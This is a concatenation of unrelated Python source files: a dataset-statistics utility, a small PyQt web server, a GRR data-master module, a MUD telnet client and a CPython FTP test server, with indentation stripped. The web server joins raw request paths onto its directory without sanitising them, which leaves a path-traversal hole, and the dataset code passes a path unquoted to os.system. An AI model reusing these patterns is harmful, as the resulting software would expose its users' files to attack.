assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne = 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
return im_file, l, shape, segments, nm, nf, ne, nc, ''
except Exception as e:
nc = 1
msg = f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
""" Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('../datasets/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
verbose: Print stats dictionary
"""
def round_labels(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *[round(x, 4) for x in points]] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith('.zip'): # path is data.zip
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
assert os.system(f'unzip -q {path} -d {path.parent}') == 0, f'Error unzipping {path}'
dir = path.with_suffix('') # dataset directory
return True, str(dir), next(dir.rglob('*.yaml')) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f'
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(im_dir / Path(f).name, quality=75) # save
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_file(yaml_path), encoding='ascii', errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data['path'] + ('-hub' if hub else ''))
stats = {'nc': data['nc'], 'names': data['names']} # statistics dictionary
for split in 'train', 'val', 'test':
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
x = np.array(x) # shape(128x80)
stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
zip(dataset.img_files, dataset.labels)]}
if hub:
im_dir = hub_dir / 'images'
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.img_files), total=dataset.n, desc='HUB Ops'):
pass
# Profile
stats_path = hub_dir / 'stats.json'
if profile:
for _ in range(1):
file = stats_path.with_suffix('.npy')
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
file = stats_path.with_suffix('.json')
t1 = time.time()
with open(file, 'w') as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file, 'r') as f:
x = json.load(f) # load hyps dict
print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
# Save, print and return
if hub:
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
WebServer.py
|
import re
import socket
import threading
from time import sleep
from PyQt5.QtCore import pyqtSignal
from typing import Tuple
from Network import StopThreading
class WebLogic:
signal_write_msg = pyqtSignal(str)
def __init__(self):
self.tcp_socket = None
self.sever_th = None
self.dir = None
self.client_socket_list = list()
def web_server_start(self, port: int) -> None:
"""
功能函数,WEB服务端开启的方法
"""
self.tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 取消主动断开连接四次握手后的TIME_WAIT状态
self.tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 设置套接字为非阻塞式
self.tcp_socket.setblocking(False)
try:
self.tcp_socket.bind(('', port))
except Exception as ret:
msg = '请检查端口号\n'
self.signal_write_msg.emit(msg)
else:
self.tcp_socket.listen()
self.sever_th = threading.Thread(target=self.web_server_concurrency)
self.sever_th.start()
msg = 'WEB服务端正在监听端口:%s\n' % str(port)
self.signal_write_msg.emit(msg)
def web_server_concurrency(self) -> None:
"""
功能函数,供创建线程的方法;
使用子线程用于监听并创建连接,使主线程可以继续运行,以免无响应
使用非阻塞式并发用于接收客户端消息,减少系统资源浪费,使软件轻量化
"""
while True:
try:
client_socket, client_address = self.tcp_socket.accept()
except Exception as ret:
sleep(0.002)
else:
client_socket.setblocking(False)
# 将创建的客户端套接字存入列表
self.client_socket_list.append((client_socket, client_address))
msg = f'WEB服务端已连接浏览器,IP:{client_address[0]}端口:{client_address[1]}\n'
self.signal_write_msg.emit(msg)
# 轮询客户端套接字列表,接收数据
for client, address in self.client_socket_list:
try:
recv_msg = client.recv(1024)
except Exception as ret:
pass
else:
if recv_msg:
msg = recv_msg.decode('utf-8')
msg_lines = msg.splitlines()
msg_dir = re.match(r"[^/]+(/[^ ]*)", msg_lines[0])
msg_dir = msg_dir.group(1)
msg = '来自IP:{}端口:{}:\n请求路径:{}\n'.format(address[0], address[1], msg_dir)
self.signal_write_msg.emit(msg)
self.web_send(client, msg_dir)
else:
client.close()
self.client_socket_list.remove((client, address))
def web_send_msg(self, msg_dir) -> Tuple[bytes, bytes]:
"""
构造浏览器请求后返回的数据
:param msg_dir: 浏览器请求的路径
:return: header头文件,body数据
"""
# 指定主页路径
if str(msg_dir) == '/':
msg_dir = '/index.html'
dir = str(self.dir) + str(msg_dir)
else:
dir = str(self.dir) + str(msg_dir)
# 根据返回文件的类型,制作相应的Content-Type数据
file_header = self.web_file_header(msg_dir)
# 打开相应的文件,并读取
try:
with open(dir, 'rb') as f:
file = f.read()
except Exception as ret:
# 如果打不开文件
file = '你要的东西不见了'.encode('utf-8')
response_header = ('HTTP/1.1 404 NOT FOUND\r\n' +
'Connection: Keep-Alive\r\n' +
'Content-Length: %d\r\n' % len(file) +
file_header +
'\r\n')
else:
# 如果打开了文件
response_header = ('HTTP/1.1 200 OK\r\n' +
'Connection: Keep-Alive\r\n' +
'Content-Length: %d\r\n' % len(file) +
file_header +
'\r\n')
response_body = file
return response_header.encode('utf-8'), response_body
@staticmethod
def web_file_header(msg_dir) -> str:
"""
根据返回文件的类型,制作相应的Content-Type数据
:param msg_dir: 历览器请求的路径
:return: Content-Type数据
"""
try:
file_type = re.match(r'[^.]+\.(.*)$', msg_dir)
file_type = file_type.group(1)
if file_type == 'png':
file_header = 'Content-Type: image/%s; charset=utf-8\r\n' % file_type
elif file_type == 'css' or file_type == 'html':
file_header = 'Content-Type: text/%s; charset=utf-8\r\n' % file_type
else:
file_header = 'Content-Type: text/html; charset=utf-8\r\n'
except Exception as ret:
file_header = 'Content-Type: text/html; charset=utf-8\r\n'
return file_header
else:
return file_header
def web_send(self, client, msg_dir) -> None:
"""
WEB服务器发送消息的方法
"""
try:
# 通过web_send_msg方法构造头文件及数据
header, body = self.web_send_msg(msg_dir)
client.send(header)
client.send(body)
msg = 'WEB服务端已回复\n'
self.signal_write_msg.emit(msg)
except Exception as ret:
print(ret)
msg = '发送失败\n'
self.signal_write_msg.emit(msg)
def web_close(self) -> None:
"""
功能函数,关闭网络连接的方法
"""
try:
for client, address in self.client_socket_list:
client.close()
self.tcp_socket.close()
msg = '已断开网络\n'
self.signal_write_msg.emit(msg)
except Exception as ret:
pass
try:
StopThreading.stop_thread(self.sever_th)
except Exception:
pass
try:
StopThreading.stop_thread(self.client_th)
except Exception:
pass
NoLink = -1
WebServer = 4
|
master.py
|
#!/usr/bin/env python
"""Data master specific classes."""
import socket
import threading
import urlparse
import urllib3
from urllib3 import connectionpool
import logging
from grr.lib import config_lib
from grr.lib import rdfvalue
from grr.lib import utils
from grr.server.data_server import constants
from grr.server.data_server import rebalance
from grr.server.data_server import utils as sutils
class DataMasterError(Exception):
"""Raised when some critical error happens in the data master."""
pass
class DataServer(object):
"""DataServer objects for each data server."""
def __init__(self, location, index):
# Parse location.
loc = urlparse.urlparse(location, scheme="http")
offline = rdfvalue.DataServerState.Status.OFFLINE
state = rdfvalue.DataServerState(size=0, load=0, status=offline)
self.server_info = rdfvalue.DataServerInformation(index=index,
address=loc.hostname,
port=loc.port,
state=state)
self.registered = False
self.removed = False
logging.info("Configured DataServer on %s:%d", self.Address(), self.Port())
def SetInitialInterval(self, num_servers):
self.server_info.interval = sutils.CreateStartInterval(self.Index(),
num_servers)
def IsRegistered(self):
return self.registered
def Matches(self, addr, port):
if isinstance(addr, list):
if self.Address() not in addr:
return False
else:
# Handle hostnames and IPs
if socket.gethostbyname(self.Address()) != socket.gethostbyname(addr):
return False
return self.Port() == port
def Register(self):
"""Once the server is registered, it is allowed to use the database."""
self.registered = True
def Deregister(self):
self.registered = False
def Port(self):
return self.server_info.port
def Address(self):
return self.server_info.address
def Index(self):
return self.server_info.index
def SetIndex(self, newindex):
self.server_info.index = newindex
def Size(self):
return self.server_info.state.size
def Load(self):
return self.server_info.state.load
def Interval(self):
return self.server_info.interval
def SetInterval(self, start, end):
self.server_info.interval.start = start
self.server_info.interval.end = end
def GetInfo(self):
return self.server_info
def UpdateState(self, newstate):
"""Update state of server."""
self.server_info.state = newstate
def Remove(self):
self.removed = True
def WasRemoved(self):
return self.removed
class DataMaster(object):
"""DataMaster information."""
def __init__(self, myport, service):
self.service = service
stores = config_lib.CONFIG["Dataserver.server_list"]
if not stores:
logging.error("Dataserver.server_list is empty: no data servers will"
" be available")
raise DataMasterError("Dataserver.server_list is empty")
self.servers = [DataServer(loc, idx) for idx, loc in enumerate(stores)]
self.registered_count = 0
# Load server mapping.
self.mapping = self.service.LoadServerMapping()
if not self.mapping:
# Bootstrap mapping.
# Each server information is linked to its corresponding object.
# Updating the data server object will reflect immediately on
# the mapping.
for server in self.servers:
server.SetInitialInterval(len(self.servers))
servers_info = [server.server_info for server in self.servers]
self.mapping = rdfvalue.DataServerMapping(version=0,
num_servers=len(self.servers),
servers=servers_info)
self.service.SaveServerMapping(self.mapping, create_pathing=True)
else:
# Check mapping and configuration matching.
if len(self.mapping.servers) != len(self.servers):
raise DataMasterError("Server mapping does not correspond "
"to the configuration.")
for server in self.servers:
self._EnsureServerInMapping(server)
# Create locks.
self.server_lock = threading.Lock()
# Register the master.
self.myself = self.servers[0]
if self.myself.Port() == myport:
self._DoRegisterServer(self.myself)
else:
raise DataMasterError("First server in Dataserver.server_list must be "
"the master.")
# Start database measuring thread.
sleep = config_lib.CONFIG["Dataserver.stats_frequency"]
self.periodic_thread = utils.InterruptableThread(
target=self._PeriodicThread, sleep_time=sleep)
self.periodic_thread.start()
# Holds current rebalance operation.
self.rebalance = None
self.rebalance_pool = []
def LoadMapping(self):
return self.mapping
def _PeriodicThread(self):
"""Periodically update our state and store the mappings."""
ok = rdfvalue.DataServerState.Status.AVAILABLE
num_components, avg_component = self.service.GetComponentInformation()
state = rdfvalue.DataServerState(size=self.service.Size(),
load=0,
status=ok,
num_components=num_components,
avg_component=avg_component)
self.myself.UpdateState(state)
self.service.SaveServerMapping(self.mapping)
def _EnsureServerInMapping(self, server):
"""Ensure that the data server exists on the mapping."""
index = server.Index()
server_info = self.mapping.servers[index]
if server_info.address != server.Address():
return False
if server_info.port != server.Port():
return False
# Change underlying server information.
server.server_info = server_info
def RegisterServer(self, addr, port):
"""Register incoming data server. Return server object."""
for server in self.servers:
if server == self.myself:
continue
if server.Matches(addr, port):
with self.server_lock:
if server.IsRegistered():
return None
else:
self._DoRegisterServer(server)
return server
return None
def HasServer(self, addr, port):
"""Checks if a given server is already in the set."""
for server in self.servers:
if server.Matches(addr, port):
return server
return None
def _DoRegisterServer(self, server):
self.registered_count += 1
server.Register()
logging.info("Registered server %s:%d", server.Address(), server.Port())
if self.AllRegistered():
logging.info("All data servers have registered!")
def DeregisterServer(self, server):
"""Deregister a data server."""
with self.server_lock:
server.Deregister()
self.registered_count -= 1
def AllRegistered(self):
"""Check if all servers have registered."""
return self.registered_count == len(self.servers)
def Stop(self):
self.service.SaveServerMapping(self.mapping)
self.periodic_thread.Stop()
def SetRebalancing(self, reb):
"""Sets a new rebalance operation and starts communication with servers."""
self.rebalance = reb
self.rebalance_pool = []
try:
for serv in self.servers:
pool = connectionpool.HTTPConnectionPool(serv.Address(),
port=serv.Port())
self.rebalance_pool.append(pool)
except urllib3.exceptions.MaxRetryError:
self.CancelRebalancing()
return False
return True
def CancelRebalancing(self):
self.rebalance = None
for pool in self.rebalance_pool:
pool.close()
self.rebalance_pool = []
def IsRebalancing(self):
return self.rebalance
def AddServer(self, addr, port):
"""Add new server to the group."""
server = DataServer("http://%s:%d" % (addr, port), len(self.servers))
self.servers.append(server)
server.SetInterval(constants.MAX_RANGE, constants.MAX_RANGE)
self.mapping.servers.Append(server.GetInfo())
self.mapping.num_servers += 1
# At this point, the new server is now part of the group.
return server
def RemoveServer(self, removed_server):
"""Remove a server. Returns None if server interval is not empty."""
interval = removed_server.Interval()
# Interval range must be 0.
if interval.start != interval.end:
return None
# Update ids of other servers.
newserverlist = []
for serv in self.servers:
if serv == removed_server:
continue
if serv.Index() > removed_server.Index():
serv.SetIndex(serv.Index() - 1)
newserverlist.append(serv.GetInfo())
# Change list of servers.
self.mapping.servers = newserverlist
self.mapping.num_servers -= 1
self.servers.pop(removed_server.Index())
self.DeregisterServer(removed_server)
removed_server.Remove()
return removed_server
def SyncMapping(self, skip=None):
"""Syncs mapping with other servers."""
pools = []
try:
# Update my state.
self._PeriodicThread()
for serv in self.servers[1:]:
if skip and serv in skip:
continue
pool = connectionpool.HTTPConnectionPool(serv.Address(),
port=serv.Port())
pools.append((serv, pool))
body = self.mapping.SerializeToString()
headers = {"Content-Length": len(body)}
for serv, pool in pools:
res = pool.urlopen("POST", "/servers/sync", headers=headers,
body=body)
if res.status != constants.RESPONSE_OK:
logging.warning("Could not sync with server %s:%d", serv.Address(),
serv.Port())
return False
state = rdfvalue.DataServerState()
state.ParseFromString(res.data)
serv.UpdateState(state)
except urllib3.exceptions.MaxRetryError:
return False
finally:
for _, pool in pools:
pool.close()
return True
def FetchRebalanceInformation(self):
"""Asks data servers for number of changes for rebalancing."""
body = self.rebalance.SerializeToString()
size = len(body)
headers = {"Content-Length": size}
for pool in self.rebalance_pool:
try:
res = pool.urlopen("POST", "/rebalance/statistics", headers=headers,
body=body)
if res.status != constants.RESPONSE_OK:
self.CancelRebalancing()
return False
reb = rdfvalue.DataServerRebalance()
reb.ParseFromString(res.data)
ls = list(reb.moving)
if ls:
logging.warning("Moving %d", ls[0])
self.rebalance.moving.Append(ls[0])
else:
self.CancelRebalancing()
return False
except urllib3.exceptions.MaxRetryError:
self.CancelRebalancing()
return False
return True
def CopyRebalanceFiles(self):
"""Tell servers to copy files to the corresponding servers."""
body = self.rebalance.SerializeToString()
size = len(body)
headers = {"Content-Length": size}
for pool in self.rebalance_pool:
try:
res = pool.urlopen("POST", "/rebalance/copy", headers=headers,
body=body)
if res.status != constants.RESPONSE_OK:
self.CancelRebalancing()
return False
except urllib3.exceptions.MaxRetryError:
self.CancelRebalancing()
return False
return True
def RebalanceCommit(self):
"""Tell servers to commit rebalance changes."""
# Save rebalance information to a file, so we can recover later.
rebalance.SaveCommitInformation(self.rebalance)
body = self.rebalance.SerializeToString()
size = len(body)
headers = {"Content-Length": size}
for i, pool in enumerate(self.rebalance_pool):
try:
res = pool.urlopen("POST", "/rebalance/perform", headers=headers,
body=body)
if res.status != constants.RESPONSE_OK:
logging.error("Server %d failed to perform transaction %s", i,
self.rebalance.id)
self.CancelRebalancing()
return None
stat = rdfvalue.DataServerState()
stat.ParseFromString(res.data)
data_server = self.servers[i]
data_server.UpdateState(stat)
except urllib3.exceptions.MaxRetryError:
self.CancelRebalancing()
return None
# Update server intervals.
mapping = self.rebalance.mapping
for i, serv in enumerate(list(self.mapping.servers)):
serv.interval = mapping.servers[i].interval
self.rebalance.mapping = self.mapping
self.service.SaveServerMapping(self.mapping)
# We can finally delete the temporary file, since we have succeeded.
rebalance.DeleteCommitInformation(self.rebalance)
rebalance.RemoveDirectory(self.rebalance)
self.CancelRebalancing()
return self.mapping
|
pycat.py
|
#!/usr/bin/env python3
from proxy import proxy
from select import select
import importlib
import json
import os
import pprint
import re
import sys
import telnetlib
import threading
import traceback
telnetlib.GMCP = b'\xc9'
class Session(object):
def __init__(self, world_module, port, arg):
self.mud_encoding = 'iso-8859-1'
self.client_encoding = 'utf-8'
self.world_module = world_module
self.arg = arg
self.world = world_module.getClass()(self, self.arg)
try:
self.socketToPipeR, self.pipeToSocketW, self.stopFlag, runProxy = proxy('::1', port)
self.pipeToSocketW = os.fdopen(self.pipeToSocketW, 'wb')
self.proxyThread = threading.Thread(target=runProxy)
self.proxyThread.start()
host_port = self.world.getHostPort()
self.log("Connecting")
self.telnet = self.connect(*host_port)
self.log("Connected")
except:
self.log("Shutting down")
self.stopFlag.set()
self.world.quit()
raise
def join(self):
self.thr.join()
def log(self, *args, **kwargs):
if len(args) == 1 and type(args[0]) == str:
line = args[0]
else:
line = pprint.pformat(args)
self.pipeToSocketW.write("---------\n".encode(self.client_encoding))
self.pipeToSocketW.write(line.encode(self.client_encoding))
self.pipeToSocketW.write(b"\n")
self.pipeToSocketW.flush()
def strip_ansi(self, line):
return re.sub(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]', '', line)
def gmcpOut(self, msg):
self.telnet.sock.sendall(telnetlib.IAC + telnetlib.SB + telnetlib.GMCP + msg.encode(self.mud_encoding) + telnetlib.IAC + telnetlib.SE)
def iac(self, sock, cmd, option):
if cmd == telnetlib.WILL:
if option == telnetlib.GMCP:
self.log("Enabling GMCP")
sock.sendall(telnetlib.IAC + telnetlib.DO + option)
self.gmcpOut('Core.Hello { "client": "Cizra", "version": "1" }')
supportables = ['char 1', 'char.base 1', 'char.maxstats 1', 'char.status 1', 'char.statusvars 1', 'char.vitals 1', 'char.worth 1', 'comm 1', 'comm.tick 1', 'group 1', 'room 1', 'room.info 1']
self.gmcpOut('Core.Supports.Set ' + str(supportables).replace("'", '"'))
self.gmcpOut('request room')
self.gmcpOut('request char')
elif option == telnetlib.TTYPE:
self.log("Sending terminal type 'Cizra'")
sock.sendall(telnetlib.IAC + telnetlib.DO + option +
telnetlib.IAC + telnetlib.SB + telnetlib.TTYPE + telnetlib.BINARY + b'Cizra' + telnetlib.IAC + telnetlib.SE)
else:
sock.sendall(telnetlib.IAC + telnetlib.DONT + option)
elif cmd == telnetlib.SE:
data = self.telnet.read_sb_data()
if data and data[0] == ord(telnetlib.GMCP):
try:
self.handleGmcp(data[1:].decode(self.mud_encoding))
except Exception as e:
traceback.print_exc()
def handleGmcp(self, data):
# this.that {JSON blob}
# TODO: move into clients
space_idx = data.find(' ')
whole_key = data[:space_idx]
value_json = data[space_idx + 1:]
nesting = whole_key.split('.')
current = self.world.gmcp
for nest in nesting[:-1]:
if nest not in current:
current[nest] = {}
current = current[nest]
lastkey = nesting[-1]
try:
val = json.loads(value_json, strict=False)
except json.decoder.JSONDecodeError:
val = {"string": value_json}
if lastkey not in current:
current[lastkey] = {}
current[lastkey] = val
self.world.handleGmcp(whole_key, val)
def connect(self, host, port):
t = telnetlib.Telnet()
t.set_option_negotiation_callback(self.iac)
# t.set_debuglevel(1)
t.open(host, int(port))
return t
def send(self, line):
print("> ", line)
self.telnet.write((line + '\n').encode(self.mud_encoding))
def handle_from_telnet(self):
try:
data = self.telnet.read_very_eager()
except:
self.log("EOF on telnet")
self.stopFlag.set()
self.world.quit()
raise
try:
data = data.decode(self.mud_encoding)
except UnicodeError as e:
print("Unicode error:", e)
print("Data was:", data)
data = ''
if not data:
_ = self.telnet.read_sb_data()
prn = []
for line in data.split('\n'):
if line:
replacement = None
try:
replacement = self.world.trigger(line.strip())
except Exception as e:
traceback.print_exc()
if replacement is not None:
line = replacement
prn.append(line)
self.pipeToSocketW.write('\n'.join(prn).encode(self.mud_encoding))
self.pipeToSocketW.flush()
def show(self, line):
self.pipeToSocketW.write(line.encode(self.client_encoding))
self.pipeToSocketW.flush()
def handle_from_pipe(self):
data = b'' # to handle partial lines
try:
data += os.read(self.socketToPipeR, 4096)
lines = data.split(b'\n')
if lines[-1] != '': # received partial line, don't process
data = lines[-1]
else:
data = b''
lines = lines[:-1] # chop off either the last empty line, or the partial line
for line in lines:
line = line.decode(self.client_encoding)
if line[-1] == '\r':
line = line[:-1]
self.handle_output_line(line)
except EOFError:
self.log("EOF in pipe")
self.stopFlag.set()
self.world.quit()
raise
def handle_output_line(self, data):
pprint.pprint(data)
if data == '#reload' and self.world:
self.log('Reloading world')
try:
state = self.world.state
gmcp = self.world.gmcp
self.world.quit()
self.world_module = importlib.reload(self.world_module)
self.world = self.world_module.getClass()(self, self.arg)
self.world.state = state
self.world.gmcp = gmcp
except Exception:
traceback.print_exc()
return
else:
handled = False
try:
handled = self.world.alias(data)
except Exception as e:
traceback.print_exc()
else:
if not handled:
self.send(data)
def run(self):
try:
while True:
fds, _, _ = select([self.telnet.get_socket(), self.socketToPipeR], [], [])
for fd in fds:
if fd == self.telnet.get_socket():
self.handle_from_telnet()
elif fd == self.socketToPipeR:
self.handle_from_pipe()
except Exception as e:
self.log("Exception in run():", e)
finally:
self.log("Closing")
self.telnet.close()
def main():
if len(sys.argv) < 3 or len(sys.argv) > 4:
print("Usage: {} worldmodule (without .py) port [arg]".format(sys.argv[0]))
exit(1)
world_module = importlib.import_module(sys.argv[1])
port = int(sys.argv[2])
arg = sys.argv[3] if len(sys.argv) == 4 else None
ses = Session(world_module, port, arg)
ses.run()
assert(__name__ == '__main__')
main()
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import HOST, HOSTv6
threading = support.import_module('threading')
TIMEOUT = 3
# the dummy data returned by server over the data channel when
# RETR, LIST, NLST, MLSD commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
MLSD_DATA = ("type=cdir;perm=el;unique==keVO1+ZF4; test\r\n"
"type=pdir;perm=e;unique==keVO1+d?3; ..\r\n"
"type=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\n"
"type=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\n"
"type=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\n"
"type=file;perm=awr;unique==keVO1+8G4; writable\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\n"
"type=dir;perm=;unique==keVO1+1t2; no-exec\r\n"
"type=file;perm=r;unique==keVO1+EG4; two words\r\n"
"type=file;perm=r;unique==keVO1+IH4; leading space\r\n"
"type=file;perm=r;unique==keVO1+1G4; file1\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\n"
"type=file;perm=r;unique==keVO1+1G4; file2\r\n"
"type=file;perm=r;unique==keVO1+1G4; file3\r\n"
"type=file;perm=r;unique==keVO1+1G4; file4\r\n")
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024).decode('ascii')
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
if self.baseclass.next_data is not None:
what = self.baseclass.next_data
self.baseclass.next_data = None
if not what:
return self.close_when_done()
super(DummyDTPHandler, self).push(what.encode('ascii'))
def handle_error(self):
raise Exception
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
# tells the socket to handle urgent data inline (ABOR command)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.next_data = None
self.rest = None
self.next_retr_data = RETR_DATA
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode('ascii')
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise Exception
def push(self, data):
asynchat.async_chat.push(self, data.encode('ascii') + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.socket() as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen()
sock.settimeout(TIMEOUT)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ','); p1 = port / 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.socket(socket.AF_INET6) as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen()
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_abor(self, arg):
self.push('226 abor ok')
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(self.next_retr_data[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
def cmd_opts(self, arg):
self.push('200 opts ok')
def cmd_mlsd(self, arg):
self.push('125 mlsd ok')
self.dtp.push(MLSD_DATA)
self.dtp.close_when_done()
def cmd_setlongretr(self, arg):
# For testing. Next RETR will return long line.
self.next_retr_data = 'x' * int(arg)
self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise Exception
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__), "pycacert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
context = ssl.SSLContext()
context.load_cert_chain(CERTFILE)
